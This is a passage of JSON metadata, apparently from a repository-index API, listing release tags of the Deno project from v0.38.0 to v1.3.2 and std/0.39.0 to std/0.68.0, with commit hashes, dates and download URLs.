ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/